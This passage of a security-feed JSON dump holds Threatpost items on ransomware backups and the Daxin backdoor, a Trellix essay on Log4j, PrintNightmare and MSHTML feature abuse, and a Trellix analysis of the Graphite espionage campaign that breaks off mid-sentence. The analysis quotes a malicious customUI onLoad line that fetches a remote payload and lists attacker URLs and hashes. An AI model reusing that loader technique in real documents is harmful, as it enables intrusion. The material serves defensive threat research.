time.\n\nJamie Moles, ExtraHop senior technical manager, dropped by the Threatpost podcast to talk about perceptions vs. reality.\n\nWannaCry, which hit a few years ago, is a prime example, he told us. The advice back then (and now) was that organizations should check their backups to make sure they\u2019re usable. Innumerable articles and blogs interrogated admins, asking, Have you actually restored a backup recently to make sure that your restores work? Are they up to date?\n\n\u201cA lot of people, we\u2019re finding, actually, that their backup procedures were good, but maybe the technology wasn\u2019t up to date or they were too reliant on things like [volume shadow copies](<https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service>) on workstations,\u201d Jamie told us. \u201cA restore when data was corrupted, not realizing that ransomware gangs turn off volume shadow copies on workstations.\n\n\u201cSo you can\u2019t restore from that. And a lot of organizations found that maybe their backups weren\u2019t fully up to date and they had to go too far back in time to restore, to get themselves operationally back to date. And this has an obvious impact in terms of operating. Resilience has a cost factor associated with it, and getting yourself back to where you were yesterday.\u201d\n\nSo\u2026not to imply anything, but hey, we just thought we\u2019d ask: Have you checked your backups lately to make sure they work?\n\nIf not, maybe go do that. We\u2019ll wait. This podcast doesn\u2019t have an expiration date.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/030722_ExtraHop_Jamie_Moles_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T14:00:32", "type": "threatpost", "title": "Multi-Ransomwared Victims Have It Coming\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T14:00:32", "id": "THREATPOST:02A472487653A461080415A3F7BB23D2", "href": "https://threatpost.com/blaming-ransomware-victims-podcast/178799/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-01T18:09:38", "description": "The Daxin malware is taking aim at hardened government networks around the world, according to researchers, with the goal of cyberespionage.\n\nThe Symantec Threat Hunter team noticed the advanced persistent threat (APT) weapon in action in November, noting that it\u2019s \u201cthe most advanced piece of malware Symantec researchers have seen from [China-linked actors](<https://threatpost.com/victory-backdoor-apt-campaign/166700/>)\u2026exhibiting technical complexity previously unseen by such actors.\u201d\n\nThey added that Daxin\u2019s specific scope of operations includes reading and writing arbitrary files; starting and interacting with arbitrary processes; and advanced lateral movement and stealth capabilities.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) also flagged the activity, which Symantec characterized as \u201clong-running.\u201d The earliest known sample of the malware dates from 2013, when it already had a large part of the codebase fully developed.\n\n\u201cDaxin malware is a highly sophisticated rootkit backdoor with complex, stealthy command-and-control (C2) functionality that enabled remote actors to communicate with secured devices not connected directly to the internet,\u201d warned CISA, in a [Monday alert](<https://www.cisa.gov/uscert/ncas/current-activity/2022/02/28/broadcom-software-discloses-apt-actors-deploying-daxin-malware>). \u201cDaxin appears to be optimized for use against hardened targets, allowing the actors to deeply burrow into targeted networks and exfiltrate data without raising suspicions.\u201d\n\n## **Built for Stealth**\n\nFrom a technical standpoint, Daxin takes the form of a Windows kernel driver, according to Symantec\u2019s [Monday analysis](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage>), and has a focus on stealth.\n\n\u201cDaxin\u2019s capabilities suggest the attackers invested significant effort into developing communication techniques that can blend in unseen with normal network traffic on the target\u2019s network,\u201d the firm found. \u201cSpecifically, the malware avoids starting its own network services. Instead, it can abuse any legitimate services already running on the infected computers.\u201d\n\nIt communicates with legitimate services via network tunneling, they added \u2013 and further, it can set up daisy-chain communications, researchers added to move internally via hops between several linked computers.\n\n\u201cDaxin is also capable of relaying its communications across a network of infected computers within the attacked organization,\u201d they said. \u201cThe attackers can select an arbitrary path across infected computers and send a single command that instructs these computers to establish requested connectivity. This use case has been optimized by Daxin\u2019s designers.\u201d\n\nDaxin also can hijack legitimate TCP/IP connections. According to Symantec, it monitors all incoming TCP traffic for certain patterns, and when a preferred pattern is detected, it disconnects the legitimate recipient and takes over the connection.\n\n\u201cIt then performs a custom key exchange with the remote peer, where two sides follow complementary steps. The malware can be both the initiator and the target of a key exchange,\u201d according to the analysis. \u201cA successful key exchange opens an encrypted communication channel for receiving commands and sending responses. Daxin\u2019s use of hijacked TCP connections affords a high degree of stealth to its communications and helps to establish connectivity on networks with strict firewall rules. It may also lower the risk of discovery by SOC analysts monitoring for network anomalies.\u201d\n\nWhen all of this is put together, the result is that a single command message that includes all the details required to establish communication, specifically the node IP address, its TCP port number and the credentials to use during custom key exchange. When Daxin receives this message, it picks the next node from the list.\n\nThe research team linked Daxin to Chinese actors because it\u2019s usually deployed alongside tools known to be associated with Chinese espionage actors.\n\n\u201cMost of the targets appear to be organizations and governments of strategic interest to China,\u201d they added. \u201cDaxin is without doubt the most advanced piece of malware Symantec researchers have seen used by a China-linked actor.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _****_[FREE downloadable eBook](<https://bit.ly/3Jy6Bfs>)_****_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-01T17:55:46", "type": "threatpost", "title": "Daxin Espionage Backdoor Ups the Ante on Chinese Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-01T17:55:46", "id": "THREATPOST:1CC682A86B6D521AD5E357B9DB3A1DFB", "href": "https://threatpost.com/daxin-espionage-backdoor-chinese-malware/178706/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "trellix": [{"lastseen": "2022-01-24T00:00:00", "description": "# Beyond Memory Corruption Vulnerabilities \u2013 A Security Extinction and Future of Exploitation\n\nBy Chintan Shah \u00b7 January 24, 2022\n\nModern exploitation techniques have changed how adversaries execute their attack strategies and how defenders analyze paths from vulnerability to exploitation. Over the past decade, we have seen rock solid focus on hardening security at both the overall Operating System and applications, which has resulted in remarkable progress being made on introducing several exploit mitigations. This progress has been gradually eliminating entire classes of memory corruption vulnerabilities in some cases. The Use-after-free (UAF) is a class of vulnerabilities, for example, which is very common in large complex code bases such as web browsers. Due to ease of exploitation, Microsoft introduced an isolated heap and delayed free of objects in its browser engine (mshtml.dll), breaking the UAF exploitation chain and making adversaries to address those barriers requiring them to re-engineer the exploits. Figure 1 below shows the part of the code where it was introduced to mitigate UAF vulnerabilities. \n\n **Figure 1 \u2013 mshtml introduction of the isolated heap to raise exploitation bar for UAF exploitation**\n\nWe can notice the different between the protected and unprotected code. While this was just the tip of the iceberg, it made exploiting UAF vulnerabilities extremely challenging since it required the attackers to address specific timing constraints and memory thresholds as well. Figure 2 below is the simple visualization of Windows OS memory exploit mitigations introduced over the past decade or so.\n\n **Figure 2 \u2013 Evolution of Windows OS exploit mitigations**\n\nHowever, time and again, we have seen these exploit mitigations being bypassed within a short period after they were introduced, primarily because either all the code including dependent, and third party code was not compatible with or not compiled with those mitigation switched on in the compiler. This essentially meant that the exploit mitigation was not enforced on every part of the code, or the mitigation itself was not completely implemented, leaving multiple loopholes which in turn could be exploited . For instance, it can be noted from the above visualization that ASLR was not implemented in initially in its entirety but rather in stages, thereby leaving much of the code still vulnerable to bypasses.\n\n##### Memory Corruption vulnerabilities \u2013 Will it become a thing of the past? \n\nWhile memory corruption vulnerabilities continue to be the most widely reported class of bugs , converting them into full-fledged weaponized exploits has become a challenge over the recent years owing to the exploit mitigations introduced at the OS as well as the client side application (For e.g., scripting engines). Translating memory corruption vulnerabilities into full blown exploits leading into arbitrary code execution, requires bypassing multiple mitigations without triggering any endpoint security solution protection or detection. This now means significant invest in effort, time and cost is required by adversaries to research exploit mitigation bypasses. On several occasions, adversaries may also need to chain multiple vulnerabilities to be able execute a working exploit on the target system which also significantly increases the development cost , raising the bar of exploitation.\n\nWe believe that this exploitation mitigations evolution is going to be crucial in shaping the nature of vulnerability classes of interested to adversaries in the future. The question : \u201cWill memory corruption vulnerabilities become extinct ?\u201d is debatable and requires some introspection.\n\n##### Exploitation Strategies of the Future - What lies ahead? \n\nMemory corruption vulnerabilities will continue to exist in the applications as long as there is some code in the application that handles memory incorrectly, but the intensity and frequency of exploitation of this class of vulnerabilities will eventually fade out. We had witnessed multiple instances of exploitation techniques in the past where attackers achieved arbitrary memory Read/Write (R/W),by exploiting a memory corruption flaw and using that primitive to change certain flags or data in the application memory leading to code execution. These set of methods codenamed \u201cdata only attacks\u201d were relatively easier strategies seen in many exploits. Eventually randomizing certain critical data structures locations in memory reduced this nature of attacks over time. \n\nWith feature rich applications, attackers will always be on a lookout for the easier strategies to achieve code execution on the target system. There are always legacy systems around exposed to the internet which will offer the path of least resistance to the attackers since they lack the mitigations introduced. However, one of the ways forward in this direction is to abuse the feature or design flaws in the application or in the network protocol. If adversaries can determine the way to abuse the inherent design or feature of the target application, for instance, making the application or a service connect to the attacker controlled machine without orchestrating the memory explicitly, it becomes relatively easier to achieve remote code execution and at the same time, causing havoc on the target machine since the functionality of the arbitrary code executed by the exploited process is completely on the imagination of the attacker. Figure 3 below is a simplistic view on the progression of exploitation strategies over the last few years. \n\n **Figure 3 \u2013 Adversary exploitation strategy evolution**\n\nWe have witnessed data only attacks and abuse of application features/design flaws several times over the last few years. They offer multiple advantages over the traditional memory corruption exploits, and some of the reasons we believe this is going to be the exploitation strategy of the future are:\n\n * It has the potential to bypass exploit mitigations in place and hence adversaries do not have to engineer the exploit specifically to address those barriers. \n * Arbitrary code is executed with the privileges of the exploited process and hence helps elevate the privileges.\n * Exploits taking advantage of application\u2019s inbuilt feature or design flaws does not have to deal with the explicit memory manipulation and space constraints before the vulnerability is exploited. Consequently, getting rid of injecting the shellcodes in the memory and the older stack pivoting techniques. \n * Relatively easier to exploit with lesser development / maintenance cost and time to weaponize it. \n\nRetrospection of critical vulnerabilities over the last couple of quarters can give us the definite clue on how the future attacks will take shape. In the following sections, we take a look at some of the more recent high impact vulnerabilities and check how features or design flaws in the service or application were abused to achieve code execution or sensitive information leak with minimum resistance.\n\n##### CVE-2021-44228 \u2013 Apache Log4J2 Logging Library Vulnerability Leading to Remote Code Execution\n\nThis RCE vulnerability reported in Apache\u2019s Log4j Logging library is one of the most critical flaws reported in the recent years, allowing attackers to execute arbitrary code on the vulnerable server that uses Log4J logging library to log text messages. [In our previous blog](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/vulnerability-discovery-in-open-source-libraries-part-1-tools-of-the-trade/>), we discussed at great length on how open source softwares serves as the building blocks of modern software development and how critical it is to audit them as any vulnerability will have a significant impact on the product using it. \n\nThe vulnerability lies in the \u201c**Lookup**\u201d method of \u201c**jndimanager**\u201d class. When the JNDI URL is included in the request message parameter to be logged by log4j, the apache\\logging\\log4j\\core\\lookup\\JndiLookup.lookup () method is called with the JNDI URL which in turn calls the net\\JndiManager.lookup () method as shown in figure 3 below, leading to the initiation of the remote JNDI lookup to the attacker controlled server. This allows the attacker controlled server to send the malicious JNDI reference in the response leading to the execution of arbitrary code on the vulnerable server. \n\n **Figure 4 \u2013 JNDI lookup**\n\nThis RCE was made possible because Java implements a variety of JNDI ( Java Naming and Directory Services) service providers like LDAP, DNS, RMI and CORBA; loading remote classes was also possible, depending on the default system properties set.\n\n**CVE-2021-44228** is a classic example of feature exploitation. The feature abused here was the [lookup substitution](<https://logging.apache.org/log4j/2.x/manual/configuration.html#PropertySubstitution>) which supports [Lookups](<https://logging.apache.org/log4j/2.x/manual/lookups.html>). Lookups are way to add values to the log messages which are typically variable names resolved using a defined map or at the runtime via implemented interfaces like [StrSubstitutor](<https://logging.apache.org/log4j/2.x/log4j-core/apidocs/org/apache/logging/log4j/core/lookup/StrSubstitutor.html>) and [StrLookup](<https://logging.apache.org/log4j/2.x/log4j-core/apidocs/org/apache/logging/log4j/core/lookup/StrLookup.html>) classes. \n\nLog4j supports the property syntax \u201c${prefix:name}\u201d where prefix indicates the Log4j that the variable name should be evaluated in the specific context. JNDI context is built into Log4J as shown below.\n\n **Figure 5 \u2013 JNDI context**\n\n **Figure 6- JNDI lookup descripton**\n\nSince JNDI lookups was enabled by default in Log4J version 2.14.1 and prior (see figure 6 above), the library could identify the JNDI references passed as the parameter value in the HTTP request headers logged on the server , consequently allowing attackers to inject malicious JNDI references in the HTTP request parameters leading to remote Java code execution.\n\n##### CVE-2021-34527 \u2013 Windows Print Spooler Service Vulnerability Leading to Remote Code Execution\n\nPrivileged remote code execution vulnerability in spoolsv.exe i.e., PrintNightmare was another critical vulnerability reported last year and serves as good illustration of how a design flaw in the protocol can be abused to execute arbitrary code on the target machine without having to operate on the memory. \n\nThe vulnerability was exploited over Print System Remote Protocol ([MS-RPRN](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1>)) and Print System Asynchronous Remote ([MS-PAR](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/695e3f9a-f83f-479a-82d9-ba260497c2d0>)) protocol, by making RPC calls over SMB. The exploit takes advantage of a classic design flaw in the implementation of the print server component in the spooler service, when RPC requests are made to MS-RPRN and MS-PAR interfaces to install the printer drivers on the target system. Making the RPC call to [RpcAddPrinterDriverEx](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b96cc497-59e5-4510-ab04-5484993b259b>) (MS-RPRN Opnum 89) or [RpcAsyncAddPrinterDriver](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/5d864e3e-5d8b-4337-89ce-cb0258ab97cd>) (MS-PAR Opnum 39) requires a DRIVER_CONTAINER structure to be passed as an argument. \n\n **Figure 7 \u2013 DRIVER_CONTAINER structure**\n\nAs indicated in the above structure details, DRIVER_CONTAINER contains **pDriverPath** and **pConfigFile**, which are the full path of the filename containing the printer driver and configuration module respectively. Both **pDriverPath** and **pConfigFile** are checked for the UNC path to prevent arbitrary code from loading. \n\nThe design or logic flaw in the code here is that same UNC path check is not applied to **pDataFile**, which is the full path of the file containing printer data. An adversary could make multiple calls to **RpcAddPrinterDriverEx** with:\n\n 1. **pDataFile** as the UNC path of the malicious DLL accessible to the target machine which when successful will copy the malicious DLL to the target machine locally.\n 2. Same API with the copied file name assigned to the **pConfigFile** (this time the malicious DLL becomes the local path) , leading to loading of malicious code by print spooler service. \n **Figure 8 \u2013 Adversary calls to driver installation API RpcAddPrinterDriverEx**\n\n##### CVE-2021-36942 \u2013 LSA Spoofing Vulnerability in Windows Leading to Credential Leaks\n\nRPC over SMB had always been on the forefront of many exploitation methods. This vulnerability could be exploited by again abusing [MS-EFSRPC](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31>) protocol, which is used in windows to manage the files on the remote system and encrypted using [Encrypting File System](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/230807ac-20be-494f-86e3-4c8ac23ea584#gt_3bd30c20-9517-4030-a48c-380362e209a1>) ( EFS ). \n\nBy making specific RPC calls like [EfsRpcOpenFileRaw](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31>) over LSARPC interface attacker can make one windows host authenticate to another server; essentially meaning that a target server can be made to authenticate to an adversary controlled server via NTLM authentication. More importantly, LSARPC can be issued using RPC calls without any prior authentication and if this target server is Active Directory (AD), then adversary can make AD connect to the arbitrary server using the machine account for NTLM authentication. This EFSRPC protocol can be abused to chain multiple vulnerabilities within the enterprise network to relay NTLM credentials to an attacker controlled server which could be used to perform lateral movement, eventually leading to complete domain compromise. \n\n **Figure 9 \u2013 Adversary making RPC call to EFSRPC interface**\n\nIf the adversary is controlling an IIS web server with the Active Directory Certificate Services ( AD CS ) feature installed and is configured to use NTLM over HTTP authentication, making an Active Directory authenticate to IIS will result into leaking the NTLM credentials to the adversary, resulting in complete domain compromise. While NTML relay attacks aren\u2019t new, it is recommended to use more secure authentication mechanism like Kerberos to prevent protocol abuse like this.\n\n **Figure 10 \u2013 Authentication providers in IIS web server**\n\nIn summary, being able to abuse a protocol or a feature to make a critical asset connect to an externally owned adversary server comes with a dangerous consequence as demonstrated by the CVE-2021-44228 Log4J vulnerability.\n\n##### CVE-2021-40444 \u2013 Windows MSHTML Vulnerability Leading to Remote Code Execution\n\nThis was yet another critical vulnerability exploited last year and is a great example of how a simple feature abuse can be chained with a logic flaw to achieve arbitrary code execution. First, Object Linking and Embedding (OLE) was used to link the document to the external OLE object. Historically, OLE has played a significant role in building weaponized office exploits and this will continue to happen as it is one of the core features of MS-Office file format designed specifically to address interoperability. \n\n[MS Office Open XML specifications](<https://www.ecma-international.org/publications-and-standards/standards/ecma-376/>) allows a document to embed or link to internal or external objects and in particular link to the external OLE object is specified via relationships . As shown in the crafted exploit document below, the **document.xml.rels** file with **Type** attribute as \u201coleObject\u201d, **Target** attribute set to the OLE object link and **TargetMode** set as external. This allows the crafted document to link to the externally hosted malicious object and invoke the respective protocol / resource handlers for rendering the object, to exploit a potential logic / design flaw in the handler. This is typical OOXML template injection techniques used in many OOXML exploits in the past. We had an in depth look on OLE exploits in our [previous blog post](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/an-inside-look-into-microsoft-rich-text-format-and-ole-exploits/>).\n\n **Figure 11 \u2013 document.xml.rels file in the OOXML document linking to external OLE object**\n\nHTML code processing is done in **mshtml.dll** while HTTP protocol and MSHTML downloads are verified for trust and handled in urlmon.dll. The design flaw in the **urlmon.dll** code was in relation to the extraction and the trust verification of the downloaded CAB file. The CAB file was downloaded via Javascript (JS) code embedded within the **side.html** page as in figure 11 above. Because of the missing path escape checks during the extraction of the CAB file, it allowed the exploit to extract the file contained within the CAB with the relative path per figure 12 below. This resulted into dropping of the malicious payload outside of the created TEMP directory, eventually allowing the dropped payload to be executed.\n\n **Figure 12 \u2013 Vulnerability in CAB file extraction function in urlmon.dll**\n\n##### Conclusion\n\nThere has been a trend in the past few years of vulnerabilities like CVE-2021-44228, CVE-2021-34527, CVE-2021-36942 and CVE-2021-40444 described above which take advantage of inherent processing flaws and are predominantly feature abuse. While memory corruption flaws will continue to proliferate as long as insecure code exists in non-memory safe languages other than Rust, we certainly expect to see the exploitation trend moving more towards exploiting design or logic flaws and protocol abuses. Consumers as well as the developers of open source software need to be more vigilant as these flaws will allow adversaries to achieve their initial system level objective of moving laterally within the network ,without worrying about the defense in depth of recently matured memory exploit mitigations.\n", "cvss3": {}, "published": "2022-01-24T00:00:00", "type": "trellix", "title": "Beyond Memory Corruption Vulnerabilities \u2013 A Security Extinction and Future of Exploitation", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-34527", "CVE-2021-36942", "CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-01-24T00:00:00", "id": "TRELLIX:ED6978182DFD9CD1EA1E539B1EDABE6C", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/beyond-memory-corruption-vulnerabilities.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-01-25T00:00:00", "description": "# Prime Minister\u2019s Office Compromised: Details of Recent Espionage Campaign\n\nBy Marc Elias \u00b7 January 25, 2022\n\nA special thanks to Christiaan Beek, Alexandre Mundo, Leandro Velasco and Max Kersten for malware analysis and support during this investigation.\n\n#### Executive Summary\n\nOur Advanced Threat Research Team have identified a multi-stage espionage campaign targeting high-ranking government officials Western Asia and Eastern Europe. As we detail the technical components of this attack, we can confirm that we have undertaken pre-release disclosure to the victims and provided all necessary content required to remove all known attack components from their environments. \n\nThe infection chain starts with the execution of an Excel downloader, most likely sent to the victim via email, which exploits an MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-defender-blog-mshtml-cve-2021-40444/>)) to execute a malicious executable in memory. The attack uses a follow-up piece of malware called Graphite because it uses Microsoft\u2019s Graph API to leverage OneDrive as a command and control server\u2014a technique our team has not seen before. Furthermore, the attack was split into multiple stages to stay as hidden as possible. \n\nCommand and control functions used an Empire server that was prepared in July 2021, and the actual campaign was active from October to November 2021. The below blog will explain the inner workings, victimology, infrastructure and timeline of the attack and, of course, reveal the IOCs and MITRE ATT&amp;CK techniques.\n\nA number of the attack indicators and apparent geopolitical objectives resemble those associated with the previously uncovered threat actor APT28. While we don\u2019t believe in attributing any campaign solely based on such evidence, we have a moderate level of confidence that our assumption is accurate. That said, we are supremely confident that we are dealing with a very skilled actor based on how infrastructure, malware coding and operation were setup.\n\nTrellix customers are protected by the different McAfee Enterprise and FireEye products that were provided with these indicators.\n\n#### Analysis of the Attack Process\n\nThis section provides an analysis of the overall process of the attack, beginning with the execution of an Excel file containing an exploit for the MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-defender-blog-mshtml-cve-2021-40444/>)) vulnerability. This is used to execute a malicious DLL file acting as a downloader for the third stage malware we called Graphite. Graphite is a newly discovered malware sample based on a OneDrive Empire Stager which leverages OneDrive accounts as a command and control server via the Microsoft Graph API. \n\nThe last phases of this multi-stage attack, which we believe is associated with an APT operation, includes the execution of different Empire stagers to finally download an Empire agent on victims\u2019 computers and engage the command and control server to remotely control the systems.\n\nThe following diagram shows the overall process of this attack.\n\n **Figure 1. Attack flow**\n\n### First Stage \u2013 Excel Downloaders\n\nAs suggested, the first stage of the attack likely uses a spear phishing email to lure victims into opening an Excel file, which goes by the name \u201cparliament_rew.xlsx\u201d. Below you can see the identifying information for this file:\n\nFile type | Excel Microsoft Office Open XML Format document \n---|--- \nFile name | parliament_rew.xlsx \nFile size | 19.26 KB \nCompilation time | 05/10/2021 \nMD5 | 8e2f8c95b1919651fcac7293cb704c1c \nSHA-256 | f007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4 \n \n **Figure 2. Decoy text observed in the Excel file**\n\nIn analyzing this file\u2019s structure, we observed that it includes a folder named \u201ccustomUI\u201d that contains a file named \u201ccustomUI.xml\u201d. Opening this file with a text editor, we observed that the malicious document uses the \u201cCustomUI.OnLoad\u201d property of the OpenXML format to load an external file from a remote server: \n\n** &lt;customUI xmlns**=\"http://schemas.microsoft.com/office/2006/01/customui\" onLoad='https://wordkeyvpload[.]net/keys/parliament_rew.xls!123'&gt; &lt;/customUI&gt;\n\nThis technique allows the attackers to bypass some antivirus scanning engines and office analysis tools, decreasing the chances of the documents being detected. \n\nThe downloaded file is again an Excel spreadsheet, but this time it is saved using the old Microsoft Office Excel 97-2003 Binary File Format (.xls). Below you can see the identifying information of the file:\n\nFile type | Microsoft Office Excel 97-2003 Binary File Format \n---|--- \nFile name | parliament_rew.xls \nFile size | 20.00 KB \nCompilation time | 05/10/2021 \nMD5 | abd182f7f7b36e9a1ea9ac210d1899df \nSHA-256 | 7bd11553409d635fe8ad72c5d1c56f77b6be55f1ace4f77f42f6bfb4408f4b3a \n \nAnalyzing the metadata objects, we can identify that the creator was using the codepage 1252 used in Western European countries and the file was created on October 5th, 2021.\n\n **Figure 3. Document metadata**\n\nLater, we analyzed the OLE objects in the document and discovered a Linked Object OLEStream Structure which contains a link to the exploit of the CVE-2021-40444 vulnerability hosted in the attackers\u2019 server. This allows the document to automatically download the HTML file and subsequently call the Internet Explorer engine to interpret it, triggering the execution of the exploit.\n\n **Figure 4. Remote link in OLE object**\n\nIn this blog post we won\u2019t examine the internals of the CVE-2021-40444 vulnerability as it has already been publicly explained and discussed. Instead, we will continue the analysis on the second stage DLL contained in the CAB file of the exploit.\n\n#### Second Stage \u2013 DLL Downloader\n\nThe second stage is a DLL executable named fontsubc.dll which was extracted from the CAB file used in the exploit mentioned before. You can see the identifying information of the file below:\n\nFile type | PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit \n---|--- \nFile name | fontsubc.dll \nFile size | 88.50 KB \nCompilation time | 28/09/2021 \nMD5 | 81de02d6e6fca8e16f2914ebd2176b78 \nSHA-256 | 1ee602e9b6e4e58dfff0fb8606a41336723169f8d6b4b1b433372bf6573baf40 \n \nThis file exports a function called \u201cCPlApplet\u201d that Windows recognizes as a control panel application. Primarily, this acts a downloader for the next stage malware which is located at hxxps://wordkeyvpload[.]net/keys/update[.]dat using COM Objects and the API \u201cURLOpenBlockingStreamW\u201d. \n\n **Figure 5. Download of next stage malware**\n\nAfter downloading the file, the malware will decrypt it with an embedded RSA Public Key and check its integrity calculating a SHA-256 of the decrypted payload. Lastly, the malware will allocate virtual memory, copy the payload to it and execute it.\n\n **Figure 6. Payload decryption and execution**\n\nBefore executing the downloaded payload, the malware will compare the first four bytes with the magic value DE 47 AC 45 in hexadecimal; if they are different, it won\u2019t execute the payload.\n\n **Figure 7. Malware magic value**\n\n#### Third Stage \u2013 Graphite Malware\n\nThe third stage is a DLL executable, never written to disk, named dfsvc.dll that we were able to extract from the memory of the previous stage. Below you can see the identifying information of the file:\n\nFile type | PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit \n---|--- \nFile name | dfsvc.dll \nFile size | 24.00 KB \nCompilation time | 20/09/2021 \nMD5 | 0ff09c344fc672880fdb03d429c7bda4 \nSHA-256 | f229a8eb6f5285a1762677c38175c71dead77768f6f5a6ebc320679068293231 \n \nWe named this malware Graphite due to the use of the Microsoft Graph API to use OneDrive as command and control. It is very likely that the developers of Graphite used the Empire OneDrive Stager as a reference due to the similarities of the functionality and the file structure used in the OneDrive account of the actors.\n\n **Figure 8. Empire OneDrive stager API requests**\n\nGraphite starts by creating a mutex with the hardcoded name \u201c250gHJAWUI289382s3h3Uasuh289di\u201d to avoid double executions, decrypt the strings and resolve dynamically the APIs it will use later. Moreover, it will calculate a bot identifier to identify the infected computer which is a CRC32 checksum of the value stored in the registry key \u201cHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\ Cryptography\\MachineGuid\u201d.\n\n **Figure 9. Graphite initializations**\n\nNext, the malware will create a thread to monitor the execution of tasks and upload its results to the OneDrive account. Result files will be uploaded to the \u201cupdate\u201d folder of the attackers\u2019 OneDrive account. \n\n **Figure 10. Thread to monitor task results**\n\nAfter that, the malware will enter into an infinite loop where every 20 minutes it will obtain a new OAuth2 token to use with the Microsoft Graph API requests and determine if there are new tasks to execute in the \u201ccheck\u201d folder of the attackers\u2019 OneDrive account. \n\n **Figure 11. Request of new OAuth2 token**\n\nOnce it obtained a valid OAuth2 token, reconnaissance data is gathered containing the following information from the victims\u2019 systems:\n\n * Running processes\n * .NET CLR version from PowerShell\n * Windows OS version\n\nThe data is compressed using the LZNT1 algorithm and encrypted with a hardcoded AES-256-CBC key with a random IV. The operator tasks are encoded in the same way. Finally, the file containing the system information is uploaded to the folder \u201c{BOT_ID}/update\u201d in OneDrive with a random name.\n\n **Figure 12. Graphite encoding data**\n\nGraphite will also query for new commands by enumerating the child files in the \"check\" subdirectory. If a new file is found, it will use the Graph API to download the content of the file and decrypt it. The decrypted tasks have two fields; the first one is a unique identifier of the task and the second one specifies the command to execute.\n\nThe command value \u201c1\u201d will instruct the malware to send the system information to the command and control again, which is the attackers\u2019 OneDrive. The command value \u201c2\u201d indicates that the decrypted task is a shellcode, and the malware will create a thread to execute it.\n\n **Figure 13. Graphite commands**\n\nIf the received task is a shellcode, it will check the third field with the magic value DE 47 AC 45 in hexadecimal and, if they are different, it 